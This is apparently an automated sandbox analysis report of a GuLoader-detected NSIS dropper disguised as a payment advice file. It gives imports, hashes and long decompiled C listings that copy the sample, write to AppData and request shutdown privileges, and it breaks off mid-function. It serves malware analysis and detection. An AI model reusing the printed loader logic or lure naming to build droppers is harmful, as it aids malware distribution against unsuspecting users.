SHELL32.dll	SHGetSpecialFolderLocation, ShellExecuteExA, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA
ADVAPI32.dll	AdjustTokenPrivileges, RegCreateKeyExA, RegOpenKeyExA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, RegEnumValueA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Report size exceeds maximum size, go to the download page of this report and download PCAP to see all network behavior.

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

System Behavior

Analysis Process: ePAY-Advice_Rf[UC7749879100].exePID: 6136, Parent PID: 3324

General

Target ID:	0
Start time:	13:57:43
Start date:	17/03/2023
Path:	C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe
Imagebase:	0x400000
File size:	329072 bytes
MD5 hash:	06BF8620598B674FC3506A2844D42D65
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.824199107.0000000004568000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: ePAY-Advice_Rf[UC7749879100].exePID: 6136, Parent PID: 3324COMMON

Execution Graph

Execution Coverage:	21.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	20.6%
Total number of Nodes:	1494
Total number of Limit Nodes:	49

Executed Functions

Function 004031D6 Relevance: 89.6, APIs: 32, Strings: 19, Instructions: 366
stringcomfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			_entry_() {
				signed int _t42;
				intOrPtr* _t47;
				CHAR* _t51;
				char* _t53;
				CHAR* _t55;
				void* _t59;
				intOrPtr _t61;
				int _t63;
				int _t66;
				signed int _t67;
				int _t68;
				signed int _t70;
				void* _t94;
				signed int _t110;
				void* _t113;
				void* _t118;
				intOrPtr* _t119;
				char _t122;
				signed int _t141;
				signed int _t142;
				int _t150;
				void* _t151;
				intOrPtr* _t153;
				CHAR* _t156;
				CHAR* _t157;
				void* _t159;
				char* _t160;
				void* _t163;
				void* _t164;
				char _t189;

				 *(_t164 + 0x18) = 0;
				 *((intOrPtr*)(_t164 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t164 + 0x20) = 0;
				 *(_t164 + 0x14) = 0x20;
				SetErrorMode(0x8001); // executed
				_t42 = GetVersion() & 0xbfffffff;
				 *0x42370c = _t42;
				if(_t42 != 6) {
					_t119 = E00406302(0);
					if(_t119 != 0) {
						 *_t119(0xc00);
					}
				}
				_t156 = "UXTHEME";
				do {
					E00406294(_t156); // executed
					_t156 =  &(_t156[lstrlenA(_t156) + 1]);
				} while ( *_t156 != 0);
				E00406302(0xa);
				 *0x423704 = E00406302(8);
				_t47 = E00406302(6);
				if(_t47 != 0) {
					_t47 =  *_t47(0x1e);
					if(_t47 != 0) {
						 *0x42370f =  *0x42370f | 0x00000040;
					}
				}
				__imp__#17(_t159);
				__imp__OleInitialize(0); // executed
				 *0x4237d8 = _t47;
				SHGetFileInfoA(0x41ecc8, 0, _t164 + 0x38, 0x160, 0); // executed
				E00405F6A(0x422f00, "NSIS Error");
				_t51 = GetCommandLineA();
				_t160 = "\"C:\\Users\\alfons\\Desktop\\ePAY-Advice_Rf[UC7749879100].exe\"";
				E00405F6A(_t160, _t51);
				 *0x423700 = 0x400000;
				_t53 = _t160;
				if("\"C:\\Users\\alfons\\Desktop\\ePAY-Advice_Rf[UC7749879100].exe\"" == 0x22) {
					 *(_t164 + 0x14) = 0x22;
					_t53 =  &M00429001;
				}
				_t55 = CharNextA(E0040592D(_t53,  *(_t164 + 0x14)));
				 *(_t164 + 0x1c) = _t55;
				while(1) {
					_t122 =  *_t55;
					_t172 = _t122;
					if(_t122 == 0) {
						break;
					}
					__eflags = _t122 - 0x20;
					if(_t122 != 0x20) {
						L13:
						__eflags =  *_t55 - 0x22;
						 *(_t164 + 0x14) = 0x20;
						if( *_t55 == 0x22) {
							_t55 =  &(_t55[1]);
							__eflags = _t55;
							 *(_t164 + 0x14) = 0x22;
						}
						__eflags =  *_t55 - 0x2f;
						if( *_t55 != 0x2f) {
							L25:
							_t55 = E0040592D(_t55,  *(_t164 + 0x14));
							__eflags =  *_t55 - 0x22;
							if(__eflags == 0) {
								_t55 =  &(_t55[1]);
								__eflags = _t55;
							}
							continue;
						} else {
							_t55 =  &(_t55[1]);
							__eflags =  *_t55 - 0x53;
							if( *_t55 != 0x53) {
								L20:
								__eflags =  *_t55 - ((( *0x409183 << 0x00000008 |  *0x409182) << 0x00000008 |  *0x409181) << 0x00000008 | "NCRC");
								if( *_t55 != ((( *0x409183 << 0x00000008 |  *0x409182) << 0x00000008 |  *0x409181) << 0x00000008 | "NCRC")) {
									L24:
									__eflags =  *((intOrPtr*)(_t55 - 2)) - ((( *0x40917b << 0x00000008 |  *0x40917a) << 0x00000008 |  *0x409179) << 0x00000008 | " /D=");
									if( *((intOrPtr*)(_t55 - 2)) == ((( *0x40917b << 0x00000008 |  *0x40917a) << 0x00000008 |  *0x409179) << 0x00000008 | " /D=")) {
										 *((char*)(_t55 - 2)) = 0;
										__eflags =  &(_t55[2]);
										E00405F6A("C:\\Users\\alfons\\AppData\\Roaming\\fumigatorium\\Tertser\\Omstrukturdnr",  &(_t55[2]));
										L30:
										_t157 = "C:\\Users\\alfons\\AppData\\Local\\Temp\\";
										GetTempPathA(0x400, _t157);
										_t59 = E004031A5(_t172);
										_t173 = _t59;
										if(_t59 != 0) {
											L33:
											DeleteFileA("1033"); // executed
											_t61 = E00402D63(_t175,  *(_t164 + 0x20)); // executed
											 *((intOrPtr*)(_t164 + 0x10)) = _t61;
											if(_t61 != 0) {
												L43:
												E004036BE();
												__imp__OleUninitialize();
												_t185 =  *((intOrPtr*)(_t164 + 0x10));
												if( *((intOrPtr*)(_t164 + 0x10)) == 0) {
													__eflags =  *0x4237b4;
													if( *0x4237b4 == 0) {
														L67:
														_t63 =  *0x4237cc;
														__eflags = _t63 - 0xffffffff;
														if(_t63 != 0xffffffff) {
															 *(_t164 + 0x14) = _t63;
														}
														ExitProcess( *(_t164 + 0x14));
													}
													_t66 = OpenProcessToken(GetCurrentProcess(), 0x28, _t164 + 0x18);
													__eflags = _t66;
													_t150 = 2;
													if(_t66 != 0) {
														LookupPrivilegeValueA(0, "SeShutdownPrivilege", _t164 + 0x24);
														 *(_t164 + 0x38) = 1;
														 *(_t164 + 0x44) = _t150;
														AdjustTokenPrivileges( *(_t164 + 0x2c), 0, _t164 + 0x28, 0, 0, 0);
													}
													_t67 = E00406302(4);
													__eflags = _t67;
													if(_t67 == 0) {
														L65:
														_t68 = ExitWindowsEx(_t150, 0x80040002);
														__eflags = _t68;
														if(_t68 != 0) {
															goto L67;
														}
														goto L66;
													} else {
														_t70 =  *_t67(0, 0, 0, 0x25, 0x80040002);
														__eflags = _t70;
														if(_t70 == 0) {
															L66:
															E0040140B(9);
															goto L67;
														}
														goto L65;
													}
												}
												E00405686( *((intOrPtr*)(_t164 + 0x10)), 0x200010);
												ExitProcess(2);
											}
											if( *0x423720 == 0) {
												L42:
												 *0x4237cc =  *0x4237cc | 0xffffffff;
												 *(_t164 + 0x18) = E00403798( *0x4237cc);
												goto L43;
											}
											_t153 = E0040592D(_t160, 0);
											if(_t153 < _t160) {
												L39:
												_t182 = _t153 - _t160;
												 *((intOrPtr*)(_t164 + 0x10)) = "Error launching installer";
												if(_t153 < _t160) {
													_t151 = E004055F1(_t185);
													lstrcatA(_t157, "~nsu");
													if(_t151 != 0) {
														lstrcatA(_t157, "A");
													}
													lstrcatA(_t157, ".tmp");
													_t162 = "C:\\Users\\alfons\\Desktop";
													if(lstrcmpiA(_t157, "C:\\Users\\alfons\\Desktop") != 0) {
														_push(_t157);
														if(_t151 == 0) {
															E004055D4();
														} else {
															E00405557();
														}
														SetCurrentDirectoryA(_t157);
														_t189 = "C:\\Users\\alfons\\AppData\\Roaming\\fumigatorium\\Tertser\\Omstrukturdnr"; // 0x43
														if(_t189 == 0) {
															E00405F6A("C:\\Users\\alfons\\AppData\\Roaming\\fumigatorium\\Tertser\\Omstrukturdnr", _t162);
														}
														E00405F6A("C:\\Users\\alfons\\AppData\\Roaming\\fumigatorium\\Tertser\\Omstrukturdnr\\Provokations.Fje",  *(_t164 + 0x1c));
														_t137 = "A";
														_t163 = 0x1a;
														do {
															E00405F8C(0, 0x41e8c8, _t157, 0x41e8c8,  *((intOrPtr*)( *0x423714 + 0x120)));
															DeleteFileA(0x41e8c8);
															if( *((intOrPtr*)(_t164 + 0x10)) != 0 && CopyFileA("C:\\Users\\alfons\\Desktop\\ePAY-Advice_Rf[UC7749879100].exe", 0x41e8c8, 1) != 0) {
																E00405D49(_t137, 0x41e8c8, 0);
																E00405F8C(0, 0x41e8c8, _t157, 0x41e8c8,  *((intOrPtr*)( *0x423714 + 0x124)));
																_t94 = E00405609(0x41e8c8);
																if(_t94 != 0) {
																	CloseHandle(_t94);
																	 *((intOrPtr*)(_t164 + 0x10)) = 0;
																}
															}
															"61538304" =  &("61538304"[1]);
															_t163 = _t163 - 1;
														} while (_t163 != 0);
														E00405D49(_t137, _t157, 0);
													}
													goto L43;
												}
												 *_t153 = 0;
												_t154 = _t153 + 4;
												if(E004059F0(_t182, _t153 + 4) == 0) {
													goto L43;
												}
												E00405F6A("C:\\Users\\alfons\\AppData\\Roaming\\fumigatorium\\Tertser\\Omstrukturdnr", _t154);
												E00405F6A("C:\\Users\\alfons\\AppData\\Roaming\\fumigatorium\\Tertser\\Omstrukturdnr\\Rekapitulerer\\Inseminerede79", _t154);
												 *((intOrPtr*)(_t164 + 0x10)) = 0;
												goto L42;
											}
											_t110 = (( *0x40915b << 0x00000008 |  *0x40915a) << 0x00000008 |  *0x409159) << 0x00000008 | " _?=";
											while( *_t153 != _t110) {
												_t153 = _t153 - 1;
												if(_t153 >= _t160) {
													continue;
												}
												goto L39;
											}
											goto L39;
										}
										GetWindowsDirectoryA(_t157, 0x3fb);
										lstrcatA(_t157, "\\Temp");
										_t113 = E004031A5(_t173);
										_t174 = _t113;
										if(_t113 != 0) {
											goto L33;
										}
										GetTempPathA(0x3fc, _t157);
										lstrcatA(_t157, "Low");
										SetEnvironmentVariableA("TEMP", _t157);
										SetEnvironmentVariableA("TMP", _t157);
										_t118 = E004031A5(_t174);
										_t175 = _t118;
										if(_t118 == 0) {
											goto L43;
										}
										goto L33;
									}
									goto L25;
								}
								_t141 = _t55[4];
								__eflags = _t141 - 0x20;
								if(_t141 == 0x20) {
									L23:
									_t15 = _t164 + 0x20;
									 *_t15 =  *(_t164 + 0x20) | 0x00000004;
									__eflags =  *_t15;
									goto L24;
								}
								__eflags = _t141;
								if(_t141 != 0) {
									goto L24;
								}
								goto L23;
							}
							_t142 = _t55[1];
							__eflags = _t142 - 0x20;
							if(_t142 == 0x20) {
								L19:
								 *0x4237c0 = 1;
								goto L20;
							}
							__eflags = _t142;
							if(_t142 != 0) {
								goto L20;
							}
							goto L19;
						}
					} else {
						goto L12;
					}
					do {
						L12:
						_t55 =  &(_t55[1]);
						__eflags =  *_t55 - 0x20;
					} while ( *_t55 == 0x20);
					goto L13;
				}
				goto L30;
			}

0x004031e6
0x004031ea
0x004031f2
0x004031f6
0x004031fb
0x00403207
0x00403210
0x00403215
0x00403218
0x0040321f
0x00403226
0x00403226
0x0040321f
0x00403228
0x0040322d
0x0040322e
0x0040323a
0x0040323e
0x00403244
0x00403252
0x00403257
0x0040325e
0x00403262
0x00403266
0x00403268
0x00403268
0x00403266
0x00403270
0x00403277
0x0040327d
0x00403293
0x004032a3
0x004032a8
0x004032ae
0x004032b5
0x004032c1
0x004032cb
0x004032cd
0x004032cf
0x004032d4
0x004032d4
0x004032e4
0x004032ea
0x004033b3
0x004033b3
0x004033b5
0x004033b7
0x00000000
0x00000000
0x004032f3
0x004032f6
0x004032fe
0x004032fe
0x00403301
0x00403306
0x00403308
0x00403308
0x00403309
0x00403309
0x0040330e
0x00403311
0x004033a3
0x004033a8
0x004033ad
0x004033b0
0x004033b2
0x004033b2
0x004033b2
0x00000000
0x00403317
0x00403317
0x00403318
0x0040331b
0x00403333
0x0040335e
0x00403360
0x00403373
0x0040339e
0x004033a1
0x004033bf
0x004033c2
0x004033cb
0x004033d0
0x004033d6
0x004033e1
0x004033e3
0x004033e8
0x004033ea
0x00403442
0x00403447
0x00403451
0x00403458
0x0040345c
0x004034f0
0x004034f0
0x004034f5
0x004034fb
0x00403500
0x00403624
0x0040362a
0x004036a6
0x004036a6
0x004036ab
0x004036ae
0x004036b0
0x004036b0
0x004036b8
0x004036b8
0x0040363a
0x00403642
0x00403644
0x00403645
0x00403652
0x00403665
0x0040366d
0x00403671
0x00403671
0x00403679
0x0040367e
0x00403685
0x00403693
0x00403695
0x0040369b
0x0040369d
0x00000000
0x00000000
0x00000000
0x00403687
0x0040368d
0x0040368f
0x00403691
0x0040369f
0x004036a1
0x00000000
0x004036a1
0x00000000
0x00403691
0x00403685
0x0040350f
0x00403516
0x00403516
0x00403468
0x004034e0
0x004034e0
0x004034ec
0x00000000
0x004034ec
0x00403471
0x00403475
0x004034ab
0x004034ab
0x004034ad
0x004034b5
0x00403527
0x00403529
0x00403530
0x00403538
0x00403538
0x00403543
0x00403548
0x00403557
0x0040355b
0x0040355c
0x00403565
0x0040355e
0x0040355e
0x0040355e
0x0040356b
0x00403571
0x00403577
0x0040357f
0x0040357f
0x0040358d
0x00403592
0x004035a4
0x004035b2
0x004035be
0x004035c4
0x004035ce
0x004035e4
0x004035f5
0x004035fb
0x00403602
0x00403605
0x0040360b
0x0040360b
0x00403602
0x0040360f
0x00403615
0x00403615
0x0040361a
0x0040361a
0x00000000
0x00403557
0x004034b7
0x004034b9
0x004034c4
0x00000000
0x00000000
0x004034cc
0x004034d7
0x004034dc
0x00000000
0x004034dc
0x004034a0
0x004034a2
0x004034a6
0x004034a9
0x00000000
0x00000000
0x00000000
0x004034a9
0x00000000
0x004034a2
0x004033f2
0x004033fe
0x00403403
0x00403408
0x0040340a
0x00000000
0x00000000
0x00403412
0x0040341a
0x0040342b
0x00403433
0x00403435
0x0040343a
0x0040343c
0x00000000
0x00000000
0x00000000
0x0040343c
0x00000000
0x004033a1
0x00403362
0x00403365
0x00403368
0x0040336e
0x0040336e
0x0040336e
0x0040336e
0x00000000
0x0040336e
0x0040336a
0x0040336c
0x00000000
0x00000000
0x00000000
0x0040336c
0x0040331d
0x00403320
0x00403323
0x00403329
0x00403329
0x00000000
0x00403329
0x00403325
0x00403327
0x00000000
0x00000000
0x00000000
0x00403327
0x00000000
0x00000000
0x00000000
0x004032f8
0x004032f8
0x004032f8
0x004032f9
0x004032f9
0x00000000
0x004032f8
0x00000000

APIs

SetErrorMode.KERNELBASE ref: 004031FB
GetVersion.KERNEL32 ref: 00403201
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403234
#17.COMCTL32(?,00000006,00000008,0000000A), ref: 00403270
OleInitialize.OLE32(00000000), ref: 00403277
SHGetFileInfoA.SHELL32(0041ECC8,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 00403293
GetCommandLineA.KERNEL32(00422F00,NSIS Error,?,00000006,00000008,0000000A), ref: 004032A8
CharNextA.USER32(00000000,"C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe",00000020,"C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe",00000000,?,00000006,00000008,0000000A), ref: 004032E4
GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000006,00000008,0000000A), ref: 004033E1
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004033F2
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004033FE
GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403412
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 0040341A
SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 0040342B
SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403433
DeleteFileA.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403447

Part of subcall function 00406302: GetModuleHandleA.KERNEL32(?,?,?,00403249,0000000A), ref: 00406314
Part of subcall function 00406302: GetProcAddress.KERNEL32(00000000,?), ref: 0040632F

Part of subcall function 00403798: GetUserDefaultUILanguage.KERNELBASE(00000002,766DFA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe",00000000), ref: 004037B2
Part of subcall function 00403798: lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr,1033,0041FD08,80000001,Control Panel\Desktop\ResourceLocale,00000000,0041FD08,00000000,00000002,766DFA90), ref: 00403888
Part of subcall function 00403798: lstrcmpiA.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr,1033,0041FD08,80000001,Control Panel\Desktop\ResourceLocale,00000000,0041FD08,00000000), ref: 0040389B
Part of subcall function 00403798: GetFileAttributesA.KERNEL32(Call), ref: 004038A6
Part of subcall function 00403798: LoadImageA.USER32 ref: 004038EF
Part of subcall function 00403798: RegisterClassA.USER32 ref: 0040392C

Part of subcall function 004036BE: CloseHandle.KERNEL32(00000280,004034F5,?,?,00000006,00000008,0000000A), ref: 004036C9

OleUninitialize.OLE32(?,?,00000006,00000008,0000000A), ref: 004034F5
ExitProcess.KERNEL32 ref: 00403516
GetCurrentProcess.KERNEL32(00000028,?,00000006,00000008,0000000A), ref: 00403633
OpenProcessToken.ADVAPI32(00000000), ref: 0040363A
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403652
AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403671
ExitWindowsEx.USER32(00000002,80040002), ref: 00403695
ExitProcess.KERNEL32 ref: 004036B8

Part of subcall function 00405686: MessageBoxIndirectA.USER32 ref: 004056E1

Strings

"C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe", xrefs: 004032AE, 004032B4, 0040346B
C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Rekapitulerer\Inseminerede79, xrefs: 004034D2
UXTHEME, xrefs: 00403228, 0040322D, 00403233
C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr, xrefs: 004033C6, 004034C7, 00403571, 0040357A
1033, xrefs: 00403442
NSIS Error, xrefs: 00403299
TEMP, xrefs: 00403426
\Temp, xrefs: 004033F8
Error launching installer, xrefs: 004034AD
C:\Users\user\AppData\Local\Temp\, xrefs: 004033D6, 004033DB, 004033F1, 004033FD, 0040340C, 00403419, 00403425, 0040342D, 00403526, 00403537, 00403542, 0040354E, 0040355B, 0040356A, 00403619
C:\Users\user\Desktop, xrefs: 00403548, 0040354D, 00403579
C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe, xrefs: 004035D3
~nsu, xrefs: 00403521
", xrefs: 00403309
SeShutdownPrivilege, xrefs: 0040364C
TMP, xrefs: 0040342E
Low, xrefs: 00403414
C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Provokations.Fje, xrefs: 00403588
.tmp, xrefs: 0040353D

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: Process$ExitFile$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDefaultDeleteDirectoryErrorImageIndirectInfoInitializeLanguageLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeUserValueVersionlstrcmpi
String ID: "$"C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr$C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Provokations.Fje$C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Rekapitulerer\Inseminerede79$C:\Users\user\Desktop$C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 1314998376-411697093
Opcode ID: 7bcbbf229ff0261bcc06b89522b60a706fee5f29980eef449c06c54d38326c76
Instruction ID: 9e312bc3f5d3d37e61d45afab2cefd1cff230aa7333539c56d086af75f350ab7
Opcode Fuzzy Hash: 7bcbbf229ff0261bcc06b89522b60a706fee5f29980eef449c06c54d38326c76
Instruction Fuzzy Hash: 90C106706082426AE7216F719D4DB2B3EACEB85706F04457FF581B61E2C77C8A05CB2E

Uniqueness

Uniqueness Score: -1.00%

Function 00404A0E Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481
windowmemoryCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00404A0E(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed char* _v28;
				long _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				signed char* _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t192;
				intOrPtr _t195;
				intOrPtr _t197;
				long _t201;
				signed int _t205;
				signed int _t216;
				void* _t219;
				void* _t220;
				int _t226;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t239;
				signed int _t241;
				signed char _t242;
				signed char _t248;
				void* _t252;
				void* _t254;
				signed char* _t270;
				signed char _t271;
				long _t273;
				long _t276;
				int _t279;
				int _t282;
				signed int _t283;
				long _t284;
				signed int _t287;
				signed int _t294;
				signed char* _t302;
				struct HWND__* _t306;
				int _t307;
				signed int* _t308;
				int _t309;
				long _t310;
				signed int _t311;
				void* _t313;
				long _t314;
				int _t315;
				signed int _t316;
				void* _t318;

				_t306 = _a4;
				_v12 = GetDlgItem(_t306, 0x3f9);
				_v8 = GetDlgItem(_t306, 0x408);
				_t318 = SendMessageA;
				_v20 =  *0x423748;
				_t282 = 0;
				_v24 =  *0x423714 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t285 = _a16;
					} else {
						_a12 = _t282;
						_t285 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t285;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t285 + 4)) == 0x408) {
							if(( *0x42371d & 0x00000002) != 0) {
								L41:
								if(_v16 != _t282) {
									_t231 = _v16;
									if( *((intOrPtr*)(_t231 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t282,  *(_t231 + 0x5c)); // executed
									}
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6a) {
										_t285 = _v20;
										_t233 =  *(_t232 + 0x5c);
										if( *((intOrPtr*)(_t232 + 0xc)) != 2) {
											 *(_t233 * 0x418 + _t285 + 8) =  *(_t233 * 0x418 + _t285 + 8) & 0xffffffdf;
										} else {
											 *(_t233 * 0x418 + _t285 + 8) =  *(_t233 * 0x418 + _t285 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t285 = 0 | _a8 != 0x00000413;
								_t239 = E0040495C(_v8, _a8 != 0x413);
								_t311 = _t239;
								if(_t311 >= _t282) {
									_t88 = _v20 + 8; // 0x8
									_t285 = _t239 * 0x418 + _t88;
									_t241 =  *_t285;
									if((_t241 & 0x00000010) == 0) {
										if((_t241 & 0x00000040) == 0) {
											_t242 = _t241 ^ 0x00000001;
										} else {
											_t248 = _t241 ^ 0x00000080;
											if(_t248 >= 0) {
												_t242 = _t248 & 0x000000fe;
											} else {
												_t242 = _t248 | 0x00000001;
											}
										}
										 *_t285 = _t242;
										E0040117D(_t311);
										_a12 = _t311 + 1;
										_a16 =  !( *0x42371c) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t285 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, _t282, _t282);
							}
							if(_a8 == 0x40b) {
								_t219 =  *0x41fcec;
								if(_t219 != _t282) {
									ImageList_Destroy(_t219);
								}
								_t220 =  *0x41fd00;
								if(_t220 != _t282) {
									GlobalFree(_t220);
								}
								 *0x41fcec = _t282;
								 *0x41fd00 = _t282;
								 *0x423780 = _t282;
							}
							if(_a8 != 0x40f) {
								L88:
								if(_a8 == 0x420 && ( *0x42371d & 0x00000001) != 0) {
									_t307 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t307);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t307);
								}
								goto L91;
							} else {
								E004011EF(_t285, _t282, _t282);
								_t192 = _a12;
								if(_t192 != _t282) {
									if(_t192 != 0xffffffff) {
										_t192 = _t192 - 1;
									}
									_push(_t192);
									_push(8);
									E004049DC();
								}
								if(_a16 == _t282) {
									L75:
									E004011EF(_t285, _t282, _t282);
									_v32 =  *0x41fd00;
									_t195 =  *0x423748;
									_v60 = 0xf030;
									_v20 = _t282;
									if( *0x42374c <= _t282) {
										L86:
										InvalidateRect(_v8, _t282, 1);
										_t197 =  *0x422edc; // 0x7dbd8b
										if( *((intOrPtr*)(_t197 + 0x10)) != _t282) {
											E00404917(0x3ff, 0xfffffffb, E0040492F(5));
										}
										goto L88;
									}
									_t308 = _t195 + 8;
									do {
										_t201 =  *((intOrPtr*)(_v32 + _v20 * 4));
										if(_t201 != _t282) {
											_t287 =  *_t308;
											_v68 = _t201;
											_v72 = 8;
											if((_t287 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t308[4]);
												_t308[0] = _t308[0] & 0x000000fe;
											}
											if((_t287 & 0x00000040) == 0) {
												_t205 = (_t287 & 0x00000001) + 1;
												if((_t287 & 0x00000010) != 0) {
													_t205 = _t205 + 3;
												}
											} else {
												_t205 = 3;
											}
											_v64 = (_t205 << 0x0000000b | _t287 & 0x00000008) + (_t205 << 0x0000000b | _t287 & 0x00000008) | _t287 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t287 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageA(_v8, 0x110d, _t282,  &_v72);
										}
										_v20 = _v20 + 1;
										_t308 =  &(_t308[0x106]);
									} while (_v20 <  *0x42374c);
									goto L86;
								} else {
									_t309 = E004012E2( *0x41fd00);
									E00401299(_t309);
									_t216 = 0;
									_t285 = 0;
									if(_t309 <= _t282) {
										L74:
										SendMessageA(_v12, 0x14e, _t285, _t282);
										_a16 = _t309;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v24 + _t216 * 4)) != _t282) {
											_t285 = _t285 + 1;
										}
										_t216 = _t216 + 1;
									} while (_t216 < _t309);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L91;
